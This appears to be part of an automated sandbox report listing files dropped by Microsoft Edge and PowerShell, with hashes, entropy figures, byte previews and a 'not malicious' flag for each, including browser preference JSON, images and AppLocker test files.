                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):262512
                                                                                                                                                                                                      Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:LsNl+mjK/l/:Ls3+mmt
                                                                                                                                                                                                      MD5:62E1581AD5CD394A06AE0CA013BF60DB
                                                                                                                                                                                                      SHA1:73D5B36F4DBC06E1823B2FD9F90018A3BD390B1E
                                                                                                                                                                                                      SHA-256:038EEDAB1FD2BFFA3D804ECB74AD4BAD69DBD3F0CE5BAF265403E872D41D48A4
                                                                                                                                                                                                      SHA-512:EBA351439E090970915D18DF471A5A536288DFFD4DBE08C7AC6BCE2ED7DD0C4B851361C0248DB6E96A554A5618F8BD09664E4DF53B401DE8FA05A6CF519E35EA
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:............................................../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):86
                                                                                                                                                                                                      Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                                                      MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                                                      SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                                                      SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
                                                                                                                                                                                                      SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):44236
                                                                                                                                                                                                      Entropy (8bit):6.089592994649168
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kuTKKGf4bQtBF1OIlPsm7DRo+yM/42cRaLMoskCio6:z/Ps+wsI7ynht5b7VLyMV/YoskFo6
                                                                                                                                                                                                      MD5:D1E50B185B4B4CA643A721D0478D687E
                                                                                                                                                                                                      SHA1:D9844E46D7A04F9B0EAB5571FDFCEC9604BAB8D3
                                                                                                                                                                                                      SHA-256:97CC851E8191F97D3B6C166C276F5E8DCA5BDFDA1A203152196426DC4E1D105E
                                                                                                                                                                                                      SHA-512:B8E0E03FDEC9814A0C1E015700A54E088EE6DB88A3D12B4224490D3A3F3DF2D4B5466EACE20DEDC66A3A9449E61D9DB70E2C3673783B2F300EE8699AB3468E59
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):45876
                                                                                                                                                                                                      Entropy (8bit):6.087934692506925
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:768:uMkbJrT8IeQc5Yaz7KKGf4UDjvOoFAO48us9oeDar4IYCio67DRo+yM/42cRaLMU:uMk1rT8HgaKfrXqrYFo67VLyMV/Yos8
                                                                                                                                                                                                      MD5:783C14326DA9F9E9315ABABE0D24C87A
                                                                                                                                                                                                      SHA1:C02BC1D16399CAC99AF2E98BEE1ED472399F1AB3
                                                                                                                                                                                                      SHA-256:F8BCBC8DEBD4243E7CB4C299495F0205CD3BC33C00042261BB74B9C4C156A808
                                                                                                                                                                                                      SHA-512:BF1D051BDBB1C02BA9FAA58A07F7DC330BD5F2AAD0D201F278E7876DD4CF1899EBFEA4E08C287EF8F56C84798143EF1A0B10F531BEE00C15D1DD9EACA2814ED4
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733316801"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2278
                                                                                                                                                                                                      Entropy (8bit):3.8362225340941936
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:uiTrlKxrgx9Sxl9Il8uti/s9J/Zk+3lyrCh+QTgwunREd1rc:m5YrhJhk+g+h+QTnu1
                                                                                                                                                                                                      MD5:ACC233BDCBCDDCABD125674D84C62363
                                                                                                                                                                                                      SHA1:130D49BD8533EA2D3A9EAEDA10AE25472ED6DA95
                                                                                                                                                                                                      SHA-256:6CA02AF38320658A7707EEA0D6B308F69E7522E2EFDFC671FEAA6BD2D6928530
                                                                                                                                                                                                      SHA-512:823307D2F1515E28A14DFDDD34CDBF2FB11C9A3082A61BD3DF021A415195FD678A890F242E8FC7A0E128F730D7A06584C820D2A24A1719DA61236F4F4E8F8A00
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.D.H.j.3.1.N.G.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.C.c.l.7.B.r.
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):4622
                                                                                                                                                                                                      Entropy (8bit):3.9987600655522204
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:96:yYrE0beVgf8KKnKNolg/2YyLkp7kKW0cldJ/zVSRaSDDhk:yMyVGjK4/2Yr7kKW0cldRzV5Su
                                                                                                                                                                                                      MD5:8DA9F4A744A5FA6E0FF0536FC8822F3C
                                                                                                                                                                                                      SHA1:2CDE9E79BE74D99628CB6E8A8313A9E7705134D1
                                                                                                                                                                                                      SHA-256:F9B095B7232AEE54E4D2395D3FC5D85E01FA72DFCADB665FBD87EF9B5F7AAF87
                                                                                                                                                                                                      SHA-512:29789DF3DDE4AE4A4E98D674A4F671FF7D67D40D4E089C0C0A6BACFEBA1F6A7623B97A77435D27E288481156FD720056FBDF1A5CC1E52C3D2216CD9AA7C25D6B
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".X.f.X.n.x.U.t.G.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.C.c.l.7.B.r.
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2684
                                                                                                                                                                                                      Entropy (8bit):3.916347846749339
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:uiTrlKx68Wa7xUsxl9Il8utNxIumCqpShAG3YBl/s8lUcIiLFjoN+atkcxd/vc:axYrB9qpnG3U/HwmFUN+aY
                                                                                                                                                                                                      MD5:3762B25F7888EE8EC179F8103D501924
                                                                                                                                                                                                      SHA1:6CC06DE9D29A0C316E0AEA87960AECDAC7C6539E
                                                                                                                                                                                                      SHA-256:AE95A68E887DBEA483AFC2F80A058EBA61845AAD1105BC070CE0D8959614A509
                                                                                                                                                                                                      SHA-512:B3E80146C01DD0200F3729FCA2A1DD7A8FA25DCA532862AC3DD1EA05D6877FF5299BD1A25A9806ACE3668E1A998DC25B4979EF9E7B637D3C2C4CCC08EFA55E68
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.M.C.1.9.h.x.l.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.C.c.l.7.B.r.
                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):61147
                                                                                                                                                                                                      Entropy (8bit):5.078058244767499
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:1536:DA1+z307j1bV3CNBQkj2Uh4iUxqaVLflJnPvlOSHCqdZJfSb7OdBYNPzqtAHkwN7:01+z30n1bV3CNBQkj2UqiUqaVLflJnPo
                                                                                                                                                                                                      MD5:CAC3D4FD8DBEA030ABA96F8F780736FB
                                                                                                                                                                                                      SHA1:A521D280279A587EAB48E40FE300B74091C63E23
                                                                                                                                                                                                      SHA-256:925201D27B013B74C70BB334EFC61D2F663E600FE67DBFB102CB4C0CA1429DBB
                                                                                                                                                                                                      SHA-512:FCF98E71FAC2D3B6C963DCDF1610F18F0640A109C8FCC442A4076665377E110E44969C7C0EC61BABE191DC5DA922A033508AA438E057C6CA41B1E05D4FBE7FA1
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:PSMODULECACHE.\...I.\.%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                                                      Entropy (8bit):1.1628158735648508
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:NlllulLhwlz:NllUO
                                                                                                                                                                                                      MD5:F442CD24937ABD508058EA44FD91378E
                                                                                                                                                                                                      SHA1:FDE63CECA441AA1C5C9C401498F9032A23B38085
                                                                                                                                                                                                      SHA-256:E2960AF08E2EE7C9C72EEA31DBBFE1B55B9BF84DE2DD7BB7204487E6AF37B8F6
                                                                                                                                                                                                      SHA-512:927E2EEA0BB3FC3D3A0DA7F45644F594CE29F11D90A84B005D723500258DE9E8B3780EB87242F4C62B64B9FEEA1869FC16076FA3AC89EC34E0546CDE1BEF7631
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:@...e................................................@..........
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):206855
                                                                                                                                                                                                      Entropy (8bit):7.983991878155761
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEIx:l81Lel7E6lEMVo/S01fDpWmEgr
                                                                                                                                                                                                      MD5:03E0A41C7EF64C946D818C2F5E4B7EC3
                                                                                                                                                                                                      SHA1:B3FEB76961D6A54EB9566EAC7E688BC55394B672
                                                                                                                                                                                                      SHA-256:CA2E03394F3B161D3A1E25F6A77B28EFDAB1D7989A0A1C2B6FC1764D8C27B7C7
                                                                                                                                                                                                      SHA-512:3F775790206CADE3A9CFBDCC3C081611330D525222D43085749A98D975B779109DF305799C53386E4B251D1D892735F5B4B31E6CD95475D0606BDD13BDB24001
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:PNG image data, 340 x 191, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):704145
                                                                                                                                                                                                      Entropy (8bit):7.998010742509996
                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                      SSDEEP:12288:jUHH5RMI17kU+zthEs2X+c2KfTFTi9JPNfgBTIxXL2v6YRl5JCqqpRFW0X2yk:2H5RMI17Oznn3Sps1IBTI9LkhSqqQ0Xq
                                                                                                                                                                                                      MD5:58B8BA396ED2C799CC9B63741513441F
                                                                                                                                                                                                      SHA1:BC29B929917D01F12614B80964663DEF3B64F2DB
                                                                                                                                                                                                      SHA-256:9854C95B373360419D9B37F635EF098EFCA3808523B65AE0030E2774B747291F
                                                                                                                                                                                                      SHA-512:5FF5B440A591576C99C8D72B4ED9197FEACFDFC37F21A6E2C5D7B3801ADFD474F3DA803A5FED74A6EE26638AC625B01B1BDED594886E6F0CB6CD3E74DD5CAE96
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.PNG........IHDR...T..........f$@....sRGB....... .IDATx^.....Y.....3...{u.m.[X..s.w...'.p...I.;....$.1.#...1...68....l...u..Ziw...3....u?]]...3.+.4..jf.......sUUm.Qo..4.....Y3....*...z..~Z..,....)].....7Z.%.T^G..e^.5..O....n.kV+.*H..F#.3..n...f..z.[+.u..Zh..f~lZ.5....L....SP..8^..3.....V0-.I..K..^Y...N..4..[e...:.>1_j.......i..>...5P..Xg...BO...f.J...Z....D.;......+..P..i._..*...<.E....L........)....~...e`.....%@....j...R.x.0~...n..n.`{r.5...-NB..1..U.,..._5^.*T...sL.w......=...@Z.....&S@..P...g...A.~.\.$%U....Z[.,.k.....4..<..H.sU.5.d....v..b...].W..v@...."o......6.:...n,+3..6Q.@.../..^..;....VPT{.0.A..lYWw...v..........K..6/).O..p#.A.'q...^.j.......F.;....J,F..q&.FCU......_...._m......g.WtM........ ..iT."....])d..AA7i..=R'.P.l.C..y..3.cU.D."5.{q....T...m..[...)....&......V.Z...k.@.R|.h^]S{5...i...A'...6[..~...5.BU....P;cR...a?@m/.._...i_a.~... B_a6:@.....d...N)i?K....9..'s..i./Z*.|..h.WQ.CMm.].DE.+*lK. ..'.....6Em..k.E..@..
                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
